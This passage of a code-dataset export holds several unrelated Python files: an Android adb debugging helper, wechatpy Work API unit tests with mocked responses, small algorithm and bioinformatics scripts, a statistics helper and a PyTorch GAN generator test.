isfile:\n\t\t\taf.append(path + os.sep + file)\n\t\telse:\n\t\t\taf += getFiles(path + os.sep + file)\n\treturn af\n\ndef workspace(argv=sys.argv[2:]):\n\taction = 'com.freeme.workspace.ACTION_DEBUG'\n\tcomp1 = 'com.freeme.launcher/com.freeme.launcher.WorkspaceReceiver'\n\tcomp2 = 'com.freeme.biglauncher/com.freeme.biglauncher.launcher.component.WorkspaceReceiver'\n\texecute('adb shell am broadcast -a %s -n %s' % (action, comp1), True)\n\texecute('adb shell am broadcast -a %s -n %s' % (action, comp2), True)\n\tlocal = argv[0] if len(argv) else ''\n\texecute('adb pull /sdcard/launcher/ %s' % local, True)\n\ndef mute():\n\tprint(execute('adb shell media volume --show --stream 2 --set 0', True))\n\tprint(execute('adb shell media volume --show --stream 3 --set 0', True))\n\ndef watermark():\n\texecute('adb shell am broadcast -a android.droi.watermark.SECRET_CODE', True)\n\ndef uid(argv=sys.argv[2:]):\n\tpkg = argv[0] if len(argv) else None\n\tif not pkg:\n\t\treturn '-h'\n\n\tpackages_list = execute('adb shell cat /data/system/packages.list', True)\n\tpattern = '(^%s )([0-9]*)' % pkg\n\tuid = None\n\tfor line in packages_list.split('\\n'):\n\t\tobj = re.match(pattern, line)\n\t\tif obj:\n\t\t\tuid = obj.group(2)\n\t\t\tbreak\n\tprint('%s uid %s' % (pkg, uid if uid else 'not found'))\n\ndef compatible_input(prompt):\n\tif sys.version_info.major == 2:\n\t\treturn raw_input(prompt)\n\telse:\n\t\treturn input(prompt)\n\nif ( __name__ == \"__main__\"):\n\n\t# dump cmd\n\tcmd = sys.argv[1] if len(sys.argv) > 1 else ''\n\n\t# help child first\n\thelp_flag = ('-h', '--help')\n\tif set(help_flag) & set(sys.argv[2:]):\n\t\thelp('Helps.%s' % cmd)\n\t\texit()\n\n\t# first, find all the devices\n\tdevices 
= []\n\tfor line in execute('adb devices', False).split('\\n'):\n\t\tif line.find('\\t') > 0:\n\t\t\t# find platform and put to %devices\n\t\t\tid = line.split('\\t')[0]\n\t\t\tselected = {2 : (id, None)}\n\t\t\tselected = {2 : (id, platform())}\n\t\t\tdevices.append(selected)\n\n\tif selected:\n\t\tfor key in selected.keys():\n\t\t\tselected = {1 : selected[key]}\n\n\tif not len(devices):\n\t\tprint('no devices/emulators found!!!')\n\t\texit()\n\telif len(devices) >= 2:\n\t\t# show selection\n\t\tfor device in devices:\n\t\t\tfor key in device.keys():\n\t\t\t\tdevi = device[key]\n\t\t\t\tprint('%d - %s - %s' % (devices.index(device) + 1, devi[0], devi[1]))\n\t\t\t\tbreak\n\t\tipt = int(compatible_input('\\nmore than one device/emulator, please choose one: '))\n\t\tipt = 1 if ipt > len(devices) or ipt < 1 else ipt\n\t\tselected = devices[ipt - 1]\n\n\tcmd_process = {\n\t'dev'\t\t:\t[dev],\n\t'log'\t\t:\t[log],\n\t'engmode'\t:\t[engmode],\n\t'pulllog'\t:\t[pulllog],\n\t'topact'\t:\t[topact],\n\t'focus'\t\t:\t[focus],\n\t'brt'\t\t:\t[brt],\n\t'density'\t:\t[density],\n\t'size'\t\t:\t[size],\n\t'sf'\t\t:\t[sf],\n\t'start'\t\t:\t[start],\n\t'settings'\t:\t[start, [['-n', 'com.android.settings/.Settings']]],\n\t'key'\t\t:\t[send_key],\n\t'back'\t\t:\t[send_key, [['KEYCODE_BACK']]],\n\t'home'\t\t:\t[send_key, [['KEYCODE_HOME']]],\n\t'menu'\t\t:\t[send_key, [['KEYCODE_MENU']]],\n\t'power'\t\t:\t[send_key, [['KEYCODE_POWER']]],\n\t'shot'\t\t:\t[send_key, [['KEYCODE_CAMERA']]],\n\t'cap'\t\t:\t[cap],\n\t'record'\t:\t[record],\n\t'mute'\t\t:\t[mute],\n\t'db'\t\t:\t[database, [sys.argv[2:], True]],\n\t'prop'\t\t:\t[prop, [sys.argv[2:], True]],\n\t'kill'\t\t:\t[kill],\n\t'clear'\t\t:\t[clear],\n\t'pushs'\t\t:\t[pushs],\n\t'workspace'\t:\t[workspace],\n\t'watermark'\t:\t[watermark],\n\t'uid'\t\t:\t[uid],\n\t'[+-][0-9]'\t:\t[volume, [cmd]],\n\t'^(-h)$|^(--help)$'\t:\t[help, ['Helps.main']],\n\t}\n\n\t# find implementation\n\timplementation = cmd_process.get(cmd)\n\tif not implementation:\n\t\tfor key, impl in cmd_process.items():\n\t\t\tobj = re.match(key, cmd)\n\t\t\tif obj and obj.group() == cmd:\n\t\t\t\timplementation = impl\n\t\t\t\tbreak\n\n\t# implementation\n\tif implementation and len(implementation):\n\t\tfunc = implementation[0]\n\t\targv = implementation[1] if len(implementation) > 1 else None\n\t\trtn = func(*argv) if argv else func()\n\t\tif rtn in help_flag:\n\t\t\thelp('Helps.%s' % cmd)\n\t\texit()\n\n\tprint('wrong parameter, try \\'sc --help\\' to get more information')\n","sub_path":"short command/sc.py","file_name":"sc.py","file_ext":"py","file_size_in_byte":13415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"386995284","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/11/4 15:49\n# @Author : Arjun\n\nimport pandas as pd\n\ninputfile = \"./data/meidi_jd.txt\"\noutputfile = \"./data/meidi_jd_process_1.txt\"\ndata = pd.read_csv(inputfile, encoding='utf-8', header=None)\nl1 = len(data)\n\"\"\"原始数据去重\"\"\"\ndata = pd.DataFrame(data[0].unique())\n\"\"\"原始数据去重\"\"\"\n# data = data.drop_duplicates()\nl2 = len(data)\ndata.to_csv(outputfile, index=False, header=False, encoding='utf-8')\nprint(u'删除了%s条评论' %(l1-l2))","sub_path":"data_analysis/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"616566468","text":"from typing import List\n\n\nclass NumArray:\n\n def __init__(self, nums: List[int]):\n # 前缀和\n self.nums 
= nums\n self.pre_sum = [0] # the first value is 0.\n pre = 0\n for num in nums:\n pre += num\n self.pre_sum.append(pre)\n\n def sumRange(self, left: int, right: int) -> int:\n return self.pre_sum[right + 1] - self.pre_sum[left]\n\n\n# Your NumArray object will be instantiated and called as such:\nobj = NumArray([-2, 0, 3, -5, 2, -1])\nparam_1 = obj.sumRange(0,2)\nprint(param_1)\n","sub_path":"Array/303-RangeSumQueryImmutable.py","file_name":"303-RangeSumQueryImmutable.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"198672551","text":"from tests.tests_walk_and_find import TestCasesWalkAndFind\nfrom solution.walk_and_find import WalkAndFind\n\nif __name__ == \"__main__\":\n ###################################\n # Tests\n ###################################\n test_cases: TestCasesWalkAndFind = TestCasesWalkAndFind()\n test_directory_base_path: str = r'.\\tests\\test_directories'\n\n test_cases.execute_tests_single_file_at_root(test_directory_base_path)\n test_cases.execute_tests_single_subdirectory(test_directory_base_path)\n test_cases.execute_tests_single_subdirectory_nested(test_directory_base_path)\n test_cases.execute_tests_multiple_subdirectories_nested(\n test_directory_base_path)\n test_cases.execute_tests_multiple_subdirectories_nested_no_file_match(\n test_directory_base_path)\n test_cases.execute_tests_no_files_or_directories(test_directory_base_path)\n test_cases.execute_tests_path_does_not_exist(test_directory_base_path)\n\n ###################################\n # Demo\n ###################################\n demo_path: str = r'.\\tests\\test_directories\\case_03'\n suffix: str = \".c\"\n walk_and_find_instance: WalkAndFind = WalkAndFind()\n\n file_paths: list = walk_and_find_instance.find_files_with_suffix(\n suffix, demo_path)\n for file_path in file_paths:\n print(file_path)\n\n \"\"\"\n Output:\n .\\tests\\test_directories\\case_03\\subdir1\\a.c\n .\\tests\\test_directories\\case_03\\subdir3\\subsubdir1\\b.c\n .\\tests\\test_directories\\case_03\\subdir5\\a.c\n .\\tests\\test_directories\\case_03\\t1.c\n \"\"\"\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"41670755","text":"# -*- coding: utf-8 -*-\nimport io\nimport os\nimport json\nimport unittest\n\nfrom httmock import urlmatch, HTTMock, response\n\nfrom wechatpy.work import WeChatClient\nfrom wechatpy.exceptions import WeChatClientException\n\n\n_TESTS_PATH = os.path.abspath(os.path.dirname(__file__))\n_FIXTURE_PATH = os.path.join(_TESTS_PATH, 'fixtures', 'work')\n\n\n@urlmatch(netloc=r'(.*\\.)?qyapi\\.weixin\\.qq\\.com$')\ndef wechat_api_mock(url, request):\n path = url.path.replace('/cgi-bin/', '').replace('/', '_')\n res_file = os.path.join(_FIXTURE_PATH, '%s.json' % path)\n content = {\n 'errcode': 99999,\n 'errmsg': 'can not find fixture %s' % res_file,\n }\n headers = {\n 'Content-Type': 'application/json'\n }\n try:\n with open(res_file, 'rb') as f:\n content = json.loads(f.read().decode('utf-8'))\n except (IOError, ValueError) as e:\n content['errmsg'] = 'Loading fixture {0} failed, error: {1}'.format(\n res_file,\n e\n )\n return response(200, content, headers, request=request)\n\n\nclass WeChatClientTestCase(unittest.TestCase):\n corp_id = '123456'\n secret = '123456'\n\n def setUp(self):\n self.client = WeChatClient(self.corp_id, self.secret)\n\n def 
test_init_client_with_access_token(self):\n client = WeChatClient(self.corp_id, self.secret, access_token='abcdef')\n assert client\n\n def test_fetch_access_token(self):\n with HTTMock(wechat_api_mock):\n token = self.client.fetch_access_token()\n self.assertEqual('1234567890', token['access_token'])\n self.assertEqual(7200, token['expires_in'])\n self.assertEqual('1234567890', self.client.access_token)\n\n def test_get_wechat_ips(self):\n with HTTMock(wechat_api_mock):\n res = self.client.misc.get_wechat_ips()\n self.assertEqual(['127.0.0.1'], res)\n\n def test_department_create(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.create('Test')\n self.assertEqual(2, res['id'])\n\n def test_department_update(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.update(2, 'Test 1')\n self.assertEqual(0, res['errcode'])\n\n def test_department_delete(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.delete(2)\n self.assertEqual(0, res['errcode'])\n\n def test_department_get(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.get()\n self.assertEqual(2, len(res))\n\n def test_department_get_users(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.get_users(2)\n self.assertEqual(1, len(res))\n\n def test_department_get_users_detail(self):\n with HTTMock(wechat_api_mock):\n res = self.client.department.get_users(2, simple=False)\n self.assertEqual(1, len(res))\n\n def test_department_map_users(self):\n with HTTMock(wechat_api_mock):\n users = self.client.department.get_map_users(2, key='email')\n self.assertEqual(users, {'zhangthree@wechat.com': 'zhangthree-userid'})\n\n users = self.client.department.get_map_users(key='mobile')\n self.assertEqual(users, {'15723333333': 'zhangthree-userid'})\n\n def test_tag_create(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.create('test')\n self.assertEqual('1', res['tagid'])\n\n def test_tag_update(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.update(1, 'test')\n self.assertEqual(0, res['errcode'])\n\n def test_tag_delete(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.delete(1)\n self.assertEqual(0, res['errcode'])\n\n def test_tag_get_users(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.get_users(1)\n self.assertEqual(1, len(res['userlist']))\n self.assertEqual(1, len(res['partylist']))\n\n def test_tag_add_users(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.add_users(1, [1, 2, 3])\n self.assertEqual(0, res['errcode'])\n\n def test_tag_delete_users(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.delete_users(1, [1, 2, 3])\n self.assertEqual(0, res['errcode'])\n\n def test_tag_list(self):\n with HTTMock(wechat_api_mock):\n res = self.client.tag.list()\n self.assertEqual(2, len(res))\n\n def test_batch_sync_user(self):\n with HTTMock(wechat_api_mock):\n res = self.client.batch.sync_user(\n 'http://example.com',\n '123456',\n '123456',\n '12345678'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_batch_replace_user(self):\n with HTTMock(wechat_api_mock):\n res = self.client.batch.replace_user(\n 'http://example.com',\n '123456',\n '123456',\n '12345678'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_batch_replace_party(self):\n with HTTMock(wechat_api_mock):\n res = self.client.batch.replace_party(\n 'http://example.com',\n '123456',\n '123456',\n '12345678'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_batch_get_result(self):\n with 
HTTMock(wechat_api_mock):\n res = self.client.batch.get_result('123456')\n self.assertEqual(0, res['errcode'])\n self.assertEqual(1, res['status'])\n\n def test_jsapi_get_ticket(self):\n with HTTMock(wechat_api_mock):\n result = self.client.jsapi.get_ticket()\n self.assertEqual(\n 'bxLdikRXVbTPdHSM05e5u5sUoXNKd8-41ZO3MhKoyN5OfkWITDGgnr2fwJ0m9E8NYzWKVZvdVtaUgWvsdshFKA', # NOQA\n result['ticket']\n )\n self.assertEqual(7200, result['expires_in'])\n\n def test_jsapi_get_jsapi_signature(self):\n noncestr = 'Wm3WZYTPz0wzccnW'\n ticket = 'sM4AOVdWfPE4DxkXGEs8VMCPGGVi4C3VM0P37wVUCFvkVAy_90u5h9nbSlYy3-Sl-HhTdfl2fzFy1AOcHKP7qg' # NOQA\n timestamp = 1414587457\n url = 'http://mp.weixin.qq.com?params=value'\n signature = self.client.jsapi.get_jsapi_signature(\n noncestr,\n ticket,\n timestamp,\n url\n )\n self.assertEqual(\n '0f9de62fce790f9a083d5c99e95740ceb90c27ed',\n signature\n )\n\n def test_user_convert_to_openid(self):\n with HTTMock(wechat_api_mock):\n res = self.client.user.convert_to_openid('zhangsan')\n self.assertEqual('oDOGms-6yCnGrRovBj2yHij5JL6E', res['openid'])\n self.assertEqual('wxf874e15f78cc84a7', res['appid'])\n\n def test_user_convert_to_user_id(self):\n with HTTMock(wechat_api_mock):\n user_id = self.client.user.convert_to_user_id(\n 'oDOGms-6yCnGrRovBj2yHij5JL6E'\n )\n self.assertEqual('zhangsan', user_id)\n\n def test_upload_media(self):\n media_file = io.StringIO('nothing')\n with HTTMock(wechat_api_mock):\n media = self.client.media.upload('image', media_file)\n self.assertEqual('image', media['type'])\n self.assertEqual('12345678', media['media_id'])\n\n def test_material_get_count(self):\n with HTTMock(wechat_api_mock):\n res = self.client.material.get_count(1)\n self.assertEqual(37, res['total_count'])\n self.assertEqual(3, res['video_count'])\n self.assertEqual(10, res['voice_count'])\n self.assertEqual(12, res['image_count'])\n self.assertEqual(3, res['file_count'])\n self.assertEqual(6, res['mpnews_count'])\n\n def test_material_batchget_mpnews(self):\n with HTTMock(wechat_api_mock):\n res = self.client.material.batchget(1, 'mpnews')\n self.assertEqual('mpnews', res['type'])\n self.assertEqual(20, res['total_count'])\n self.assertEqual(3, res['item_count'])\n self.assertEqual(\n '2-G6nrLmr5EC3MMb_-zK1dDdzmd0p7cNliYu',\n res['itemlist'][0]['media_id']\n )\n\n def test_material_delete(self):\n media_id = '2-G6nrLmr5EC3MMb_-zK1dDdzmd0p7cNliYu'\n with HTTMock(wechat_api_mock):\n res = self.client.material.delete(1, media_id)\n self.assertEqual('deleted', res['errmsg'])\n\n def test_material_get_mpnews(self):\n media_id = '2-G6nrLmr5EC3MMb_-zK1dDdzmd0p7cNliYu'\n with HTTMock(wechat_api_mock):\n res = self.client.material.get_articles(1, media_id)\n self.assertEqual('mpnews', res['type'])\n self.assertEqual(\n '2-G6nrLmr5EC3MMb_-zK1dDdzmd0' +\n 'p7cNliYu9V5w7o8K0HuucGBZCzw4HmLa5C',\n res['mpnews']['articles'][0]['thumb_media_id']\n )\n self.assertEqual(\n '2-G6nrLmr5EC3MMb_-zK1dDdzmd0' +\n 'p7cNliYu9V5w7oovsUPf3wG4t9N3tE',\n res['mpnews']['articles'][1]['thumb_media_id']\n )\n\n def test_reraise_requests_exception(self):\n @urlmatch(netloc=r'(.*\\.)?qyapi\\.weixin\\.qq\\.com$')\n def _wechat_api_mock(url, request):\n return {'status_code': 404, 'content': '404 not found'}\n\n try:\n with HTTMock(_wechat_api_mock):\n self.client.material.get_count(1)\n except WeChatClientException as e:\n self.assertEqual(404, e.response.status_code)\n\n def test_shakearound_get_shake_info(self):\n with HTTMock(wechat_api_mock):\n res = self.client.shakearound.get_shake_info('123456')\n 
self.assertEqual(14000, res['page_id'])\n self.assertEqual('zhangsan', res['userid'])\n\n def test_service_get_provider_token(self):\n with HTTMock(wechat_api_mock):\n res = self.client.service.get_provider_token('provider_secret')\n\n self.assertEqual(7200, res['expires_in'])\n self.assertEqual('enLSZ5xxxxxxJRL', res['provider_access_token'])\n\n def test_service_get_login_info(self):\n with HTTMock(wechat_api_mock):\n res = self.client.service.get_login_info(\n 'enLSZ5xxxxxxJRL',\n 'auth_code'\n )\n\n self.assertTrue(res['is_sys'])\n self.assertTrue(res['is_inner'])\n\n def test_chat_create(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.create(\n '1', 'chat', 'zhangsan', ['zhangsan', 'lisi', 'wangwu']\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_get(self):\n with HTTMock(wechat_api_mock):\n chat = self.client.chat.get('235364212115767297')\n\n self.assertEqual('235364212115767297', chat['chatid'])\n self.assertEqual('zhangsan', chat['owner'])\n\n def test_chat_update(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.update(\n '235364212115767297',\n 'lisi',\n '企业应用中心',\n 'zhangsan',\n ['zhaoli'],\n ['zhangsan']\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_quit(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.quit('235364212115767297', 'lisi')\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_clear_notify(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.clear_notify('zhangsan', 'single', 'lisi')\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_set_mute(self):\n mute_list = [\n {'userid': 'zhangsan', 'status': 0},\n {'userid': 'lisi', 'status': 1},\n ]\n with HTTMock(wechat_api_mock):\n res = self.client.chat.set_mute(mute_list)\n\n self.assertEqual(0, res['errcode'])\n self.assertEqual(['zhangsan'], res['invaliduser'])\n\n def test_chat_send_text(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.send_text(\n 'zhangsan', 'single', 'lisi', 'hello'\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_send_image(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.send_image(\n 'zhangsan', 'single', 'lisi', 'media_id'\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_send_file(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.send_file(\n 'zhangsan', 'single', 'lisi', 'media_id'\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_follow_user_list(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_follow_user_list()\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_list(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.list('userid')\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get('external_userid')\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_add_contact_way(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.add_contact_way(\n 1, 1, 1, 'remark', True, 'state', ['UserID1', 'UserID2'],\n ['PartyID1', 'PartyID2']\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_contact_way(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_contact_way(\n '42b34949e138eb6e027c123cba77fad7'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_update_contact_way(self):\n with HTTMock(wechat_api_mock):\n res = 
self.client.external_contact.update_contact_way(\n '42b34949e138eb6e027c123cba77fad7', '渠道客户', True,\n 1, 'teststate', ['UserID1', 'UserID2', 'UserID3'],\n ['PartyID1', 'PartyID2']\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_del_contact_way(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.del_contact_way(\n '42b34949e138eb6e027c123cba77fad7'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_add_msg_template(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.add_msg_template(\n {\n \"external_userid\": [\n \"woAJ2GCAAAXtWyujaWJHDDGi0mACas1w\",\n \"wmqfasd1e1927831291723123109r712\"\n ],\n \"sender\": \"zhangsan\",\n \"text\": {\n \"content\": \"文本消息内容\"\n },\n \"image\": {\n \"media_id\": \"MEDIA_ID\"\n }\n }\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_group_msg_result(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_group_msg_result(\n 'msgGCAAAXtWyujaWJHDDGi0mACas1w'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_user_behavior_data(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_user_behavior_data(\n [\"zhangsan\", \"lisi\"], 1536508800, 1536940800\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_send_welcome_msg(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.send_welcome_msg(\n {\n \"welcome_code\": \"CALLBACK_CODE\",\n \"text\": {\n \"content\": \"文本消息内容\"\n },\n \"image\": {\n \"media_id\": \"MEDIA_ID\"\n },\n \"link\": {\n \"title\": \"消息标题\",\n \"picurl\": \"https://example.pic.com/path\",\n \"desc\": \"消息描述\",\n \"url\": \"https://example.link.com/path\"\n },\n \"miniprogram\": {\n \"title\": \"消息标题\",\n \"pic_media_id\": \"MEDIA_ID\",\n \"appid\": \"wx8bd80126147df384\",\n \"page\": \"/path/index\"\n }\n }\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_unassigned_list(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_unassigned_list(\n 0, 100\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_transfer(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.transfer(\n \"woAJ2GCAAAXtWyujaWJHDDGi0mACH71w\", \"zhangsan\", \"lisi\"\n )\n self.assertEqual(0, res['errcode'])\n","sub_path":"tests/test_work_client.py","file_name":"test_work_client.py","file_ext":"py","file_size_in_byte":17634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"285803621","text":"import re\nimport pyperclip\n\n\"\"\"preparing dictionary for translation\"\"\"\ncodon_table = open('prot_table.txt', \"r\")\ntab = codon_table.read()\n\ncodons = re.findall('[AUGC]{3}', tab)\n\naas = re.findall('\\s\\w\\s|Stop', tab)\n\n\ndef cleaning(x):\n x = x.replace(\" \", \"\")\n x = x.replace(\"\\n\", \"\")\n return x\ncaas = list(map(cleaning, aas))\n\n\ntrans = {}\nfor i in range(len(codons)):\n trans[str(codons[i])] = caas[i]\n\n\"\"\"translation\"\"\"\nseq = open(\"rosalind_prot.txt\", \"r\")\ns = seq.read()\n\ncods = re.findall(\".{3}\", s)\n\ntranslation = \"\"\nfor cod in cods:\n if trans[cod] == \"Stop\":\n break\n else:\n translation += trans[cod]\nprint(translation)\npyperclip.copy(translation)\n 
\n","sub_path":"Bioinformatics-Stronghold/prot.py","file_name":"prot.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"35960508","text":"class Solution:\n def peakIndexInMountainArray(self, A: List[int]) -> int:\n\n increasing = True\n for index, value in enumerate(A):\n\n if index > 0:\n\n if value < A[index - 1] and increasing is True:\n return index - 1\n","sub_path":"852_Peak_Index_In_A_Mountain_Array.py","file_name":"852_Peak_Index_In_A_Mountain_Array.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"511592314","text":"\"\"\"\nCalcula los grados de libertad efectivos (EDoF) segun la expresion Ndt/T, donde\nN es la cantidad de datos, dt es el intervalo muestral y T es la integral time\nscale.\n\nT se calcula integrando el area bajo la curva de la funcion de autocorrelacion\nnormalizada hasta el primer zero-crossing y dividiendo por la varianza de la\nserie.\n\nRef.: Emery & Thomson\n@author: Julia Neme\n\"\"\"\n\ndef get_eddof(x):\n import numpy as np\n from scipy import integrate\n x = x[~np.isnan(x)]\n N = np.nanmax(len(x))\n N1 = N-1\n x = x - np.nanmean(x)\n\n # Calcula la funcion de autocorrelacion para lags desde\n # -N1 a N1. Por lo tanto, la correlacion sin lag (la\n # varianza de la serie) estara en c[N1] = c[N-1].\n\n c = np.correlate(x, x, 'full')\n\n # Normaliza la funcion de autocorrelacion segun N-1-k donde\n # k es el numero de lags, positivo.\n\n lags = np.abs(np.arange(-N1+1, N1, 1))\n cn = c[1:-1]/(N-1-lags)\n Var = cn[N1-1]\n\n # Busca el primer zero-crossing\n\n n = 0\n while (cn[N1+n] > 0) and (n < N1):\n n = n+1\n\n # Calcula el tiempo integral y los EDoF\n\n T = integrate.simps(cn[N1-1-n:N1+n])/Var\n\n edof = N/T\n if (np.isnan(edof) == False) and (np.isinf(edof) == False):\n edof = int(edof)\n else:\n edof = np.nan\n return edof\n","sub_path":"eddof.py","file_name":"eddof.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"599919551","text":"import timeit\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n# function removes node and value from graph and returns\n# new graph\ndef delete_from_graph(graph, node, value):\n\tfor k, v in graph.items():\n\t\tif (k == node or k == value):\n\t\t\tfor edge in v:\n\t\t\t\tv.remove(edge)\n\t\t\t\tgraph = delete_from_graph(graph, node, value)\n\t\tif node in v:\n\t\t\tv.remove(node)\n\t\t\tgraph = delete_from_graph(graph, node, value)\n\t\tif value in v:\n\t\t\tv.remove(value)\n\t\t\tgraph = delete_from_graph(graph, node, value)\n\n\treturn graph\n\n# function implements approximate algorithm and returns\n# vertex cover\ndef approx_vertex_cover(graph):\n\tmarked = []\n\n\tfor k, v in graph.items():\n\t\tfor node in v:\n\t\t\tmarked.append((k, node))\n\t\t\tgraph = delete_from_graph(graph, k, node)\n\n\tif (len(marked) == 1):\n\t\treturn 2\n\n\treturn len(marked)\n\ndef main():\n\tgraf1 = nx.connected_watts_strogatz_graph(5, 4, 0.5, seed = 1)\n\tgraf2 = nx.connected_watts_strogatz_graph(50, 20, 0.5, seed = 1)\n\tgraf3 = nx.connected_watts_strogatz_graph(1000, 50, 0.5, seed = 1)\n\tgraph = nx.to_dict_of_lists(graf3)\n\tg = nx.Graph(graph)\n\tstart = timeit.default_timer()\n\tprint(\"Vertex cover: \", approx_vertex_cover(graph))\n\tstop = timeit.default_timer()\n\tprint('Time: ', stop - start)\n\tnx.draw(g, with_labels = 
True)\n\tplt.show()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"approx_vc.py","file_name":"approx_vc.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"92521353","text":"import torch\nimport torch.nn as nn\n\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nDIM = 64 # Model dimensionality\nBATCH_SIZE = 50 # Batch size\nCRITIC_ITERS = 5 # For WGAN and WGAN-GP, number of critic iters per gen iter\nLAMBDA = 10 # Gradient penalty lambda hyperparameter\nITERS = 200000 # How many generator iterations to train for\nOUTPUT_DIM = 784 # Number of pixels in MNIST (28*28)\n\nclass Generator(nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n\n self.preprocess = nn.Sequential(nn.Linear(128, 4*4*4*DIM), nn.ReLU(True),)\n self.block1 = nn.Sequential(nn.ConvTranspose2d(4*DIM, 2*DIM, 5), nn.ReLU(True) )\n self.block2 = nn.Sequential(nn.ConvTranspose2d(2*DIM, DIM, 5), nn.ReLU(True), )\n self.deconv_out = nn.ConvTranspose2d(DIM, 1, 8, stride=2) \n self.sigmoid = nn.Sigmoid()\n\n def forward(self, input):\n output = self.preprocess(input)\n output = output.view(-1, 4*DIM, 4, 4)\n #print output.size()\n output = self.block1(output)\n #print output.size()\n output = output[:, :, :7, :7]\n #print output.size()\n output = self.block2(output)\n #print output.size()\n output = self.deconv_out(output)\n output = self.sigmoid(output)\n #print output.size()\n return output.view(-1, OUTPUT_DIM)\n\n\nG = Generator().to(device)\nnoise = torch.randn((128), device=device)\nout = G(noise)\nprint(out.shape)","sub_path":"src/gan/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
